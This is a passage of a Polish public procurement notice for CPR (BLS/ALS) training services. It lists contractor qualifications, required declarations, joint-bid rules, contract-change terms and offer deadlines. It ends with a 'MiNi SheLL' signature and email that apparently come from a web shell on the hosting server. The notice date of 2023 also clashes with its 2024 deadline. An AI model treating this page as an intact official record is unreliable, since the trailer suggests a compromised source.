akademickim czynnie działający w zawodzie – osoby te, mające co najmniej dwuletnie doświadczenie w<br/>pracy i co najmniej roczne doświadczenie w prowadzeniu szkoleń z zakresu resuscytacji krążeniowo – oddechowej w<br/>standardzie RKO BLS i RKO ALS.<br/>6.5.4.2. Wykonawca wykaże spełnienie warunku, jeśli w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał co najmniej jedną usługę szkolenia dla co najmniej 500 osób w ramach jednej umowy,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.2. W celu oceny spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt 6.2. SWZ Zamawiający żąda następujących oświadczeń i dokumentów:<br/>7.2.1. Wykonawca zobowiązany jest złożyć wraz z ofertą:<br/>7.2.1.1. aktualne na dzień składania ofert wstępne oświadczenie o spełnianiu warunków udziału w postępowaniu. <br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>wzorem stanowiącym Załącznik nr 4 do SWZ,<br/>7.2.2. Wykonawca, którego oferta została najwyżej oceniona zobowiązany jest złożyć na wezwanie Zamawiającego, w terminie<br/>wskazanym w wezwaniu, nie krótszym niż 5 dni, następujące aktualne na dzień złożenia dokumenty:<br/>7.2.2.1. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych<br/>referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesiące –<br/>Załącznik nr 9.<br/>7.2.2.2. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z Załącznikiem nr 10 do<br/>SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.1. W celu wykazania braku<br/>podstaw wykluczenia Wykonawcy z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w pkt 6.1. SWZ,<br/>Zamawiający żąda dokumentów i oświadczeń wskazanych poniżej:<br/>7.1.1. Wykonawca zobowiązany jest złożyć wraz z ofertą:<br/>7.1.1.1. aktualne na dzień składania ofert oświadczenie o braku podstaw wykluczenia Wykonawcy z postępowania – zgodnie ze<br/>wzorem stanowiącym Załącznik nr 5 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>7.1.2. Wykonawca, którego oferta została najwyżej oceniona zobowiązany jest złożyć na wezwanie Zamawiającego, w terminie<br/>wskazanym w wezwaniu, nie krótszym niż 5 dni, następujące aktualne na dzień złożenia dokumenty:<br/>7.1.2.1. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 ustawy Pzp -<br/>wzór oświadczenia stanowi załącznik 5a do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11.5. Ofertę stanowi:<br/>11.5.1. wypełniony i podpisany: formularz „Oferta”, zgodny z Załącznikiem nr 1 do SWZ<br/>oraz<br/>11.5.2. Formularz asortymentowo – cenowy - stanowiący załącznik Nr 2 do SWZ.<br/>Brak złożenia Formularza asortymentowo - cenowego stanowi podstawę odrzucenia oferty z postępowania.<br/>11.6. Do oferty należy załączyć:<br/>11.6.1. oświadczenia wymagane postanowieniami SWZ tj.:<br/>11.6.2. aktualne na dzień składania ofert oświadczenie o braku podstaw wykluczenia Wykonawcy z postępowania – zgodnie<br/>ze wzorem stanowiącym - Załącznik nr 5 do SWZ,<br/>11.6.3. aktualne na dzień składania ofert wstępne oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie<br/>ze wzorem stanowiącym - Załącznik nr 4 do SWZ,<br/>11.6.4. pełnomocnictwo do podpisania oferty oraz do podpisania innych dokumentów i oświadczeń składanych wraz z<br/>ofertą, o ile zostały podpisane przez pełnomocnika. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do<br/>wykonywania, których pełnomocnik jest upoważniony,<br/>11.6.5. zobowiązanie podmiotu udostepniającego Wykonawcy zasoby - do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - o ile Wykonawca korzysta ze zdolności<br/>innych podmiotów na zasadach określonych w art. 118 ustawy. Zobowiązanie lub inny podmiotowy środek dowodowy w<br/>opisywanym zakresie, przekazuje się w postaci elektronicznej, i opatruje kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym. W przypadku, gdy zobowiązanie (inny podmiotowy środek dowodowy) zostało<br/>wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej – o ile dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>6.9.1. żaden z podmiotów wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie<br/>pkt. 6.<br/>6.9.2. W przypadku gdy Wykonawca wykonywał w ramach kontraktu/umowy większy zakres usług, dla potrzeb niniejszego<br/>zamówienia powinien wyodrębnić i podać wartość uslug.*<br/>6.9.3. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi Wykonawcami,<br/>wykaz winien zawierać usługi, w których wykonaniu Wykonawca bezpośrednio uczestniczył.*<br/>6.9.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy.<br/>6.9.5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>7.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>7.4.1. są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>Ogłoszenie nr 2023/BZP 00442125/01 z dnia 2023-10-12<br/>2023-10-12 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>publicznego albo reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia Umowy o wykonanie<br/>zamówienia publicznego.<br/>7.4.2. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest samodzielnie wykazać<br/>brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu składając wraz z ofertą<br/>oświadczenia o których mowa w pkt. 7.1.1.1. i pkt. 7.2.1.1. SWZ.<br/>7.4.3. Oferta Wykonawców występujących wspólnie musi być podpisana i oznaczona w taki sposób, by prawnie<br/>zobowiązywała wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia.<br/>7.4.4. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>7.4.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do ofert oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy.<br/>7.4.6. Spółka cywilna jest kwalifikowana jako Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dlatego jej<br/>wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania w<br/>postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane za zgodą obu stron wyrażoną w formie pisemnej<br/>pod rygorem nieważności.<br/>2.Zamawiający dopuszcza możliwość zmiany postanowień umowy, w szczególności w przypadku wystąpienia niżej<br/>wymienionych okoliczności:<br/>2.1.zmianę ceny przedmiotu umowy w zakresie przewidzianym umową w przypadku gdy:<br/>2.1.1. nastąpi obniżka ceny, promocja bądź wystąpią inne czynniki skutkujące obniżką ceny usługi;<br/>2.1.2. nastąpi zmiana stawki podatku VAT. Zmiana stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego<br/>stawkę. Cena netto pozostaje bez zmian;<br/>Wykonawca jest zobowiązany do poinformowania Zamawiającego w formie pisemnej z 7 – dniowym wyprzedzeniem o tej<br/>zmianie.<br/>2.2.zmianę organizacyjną po stronie Wykonawcy lub Zamawiającego w szczególności w przypadku, gdy nastąpi zmiana<br/>adresu siedziby firmy, miejsca wykonywania usługi,<br/>2.3.w przypadku istotnych zmian organizacyjnych po stronie Zamawiającego niezależnych od Niego, Zamawiający może<br/>rozwiązać umowę w części lub w całości z miesięcznym okresem wypowiedzenia ze skutkiem na koniec miesiąca<br/>kalendarzowego. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania<br/>części umowy.<br/>3. Zamawiający dopuszcza możliwość przedłużenia terminu obowiązywania umowy w przypadku niezrealizowania umowy w<br/>terminie, z przyczyn leżących po stronie Zamawiającego, nie dłużej jednak niż o 2 miesiące.<br/>4. Zamawiający dopuszcza zmianę postanowień zawartej umowy, w tym zmianę terminu realizacji umowy, w następujących<br/>przypadkach:<br/>1.1.w uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności, których nie<br/>można było przewidzieć w chwili zawarcia umowy,<br/>1.2.w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany wynikły w trakcie<br/>realizacji zamówienia,<br/>1.3.zmiany w sposobie dokonywania płatności, rozliczenia, itp.,<br/>1.4.zmiany danych Wykonawcy np. zmiana adresu, konta bankowego, nr REGON, osób kontaktowych itp.<br/>1.5.zmiany stanu prawnego, zmiany stawki podatku VAT,<br/>1.6.braku możliwości kontynuacji usług z winy Zamawiającego,<br/>1.7.rezygnacji przez Zamawiającego z części usług,<br/>1.8.zmiany miejsca przeprowadzenia szkolenia,<br/>1.9.konieczności zmiany terminu końcowego wykonania przedmiotu umowy, w przypadku, gdy nie można było tego<br/>przewidzieć w chwili podpisania umowy,<br/>1.10.możliwa jest korzystna dla Zamawiającego zmiana terminów i sposobu płatności za realizację przedmiotu zamówienia,<br/>1.11.w przypadku wystąpienia awarii, siły wyższej np. klęski żywiołowe, konflikt zbrojny, zdarzenia związane z działaniem sił<br/>natury, ogłoszenia stanu epidemicznego, pandemii itp.<br/>1.12.niezbędna jest zmiana sposobu wykonania zamówienia, o ile taka zmiana jest korzystna dla Zamawiającego lub jest<br/>konieczna w celu prawidłowego wykonania umowy,<br/>1.13.Zamawiający dopuszcza zmianę Wykonawcy, któremu udzielił zamówienia. Wykonawcę dotychczasowego może<br/>zastąpić nowy Wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu,<br/>nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy.<br/>1.14. Z powodu okoliczności zaistniałych po stronie Zamawiającego możliwe jest wydłużenia terminu wykonania<br/>zamówienia.<br/>Ogłoszenie nr 2023/BZP 00442125/01 z dnia 2023-10-12<br/>2023-10-12 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1.15. Zmiana liczebności grup, zmiana liczby pracowników Zamawiającego podlegająca przeszkoleniu,<br/>5. Warunki dokonania zmian: - c.d. zapisów w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/csk_umed</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-29 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com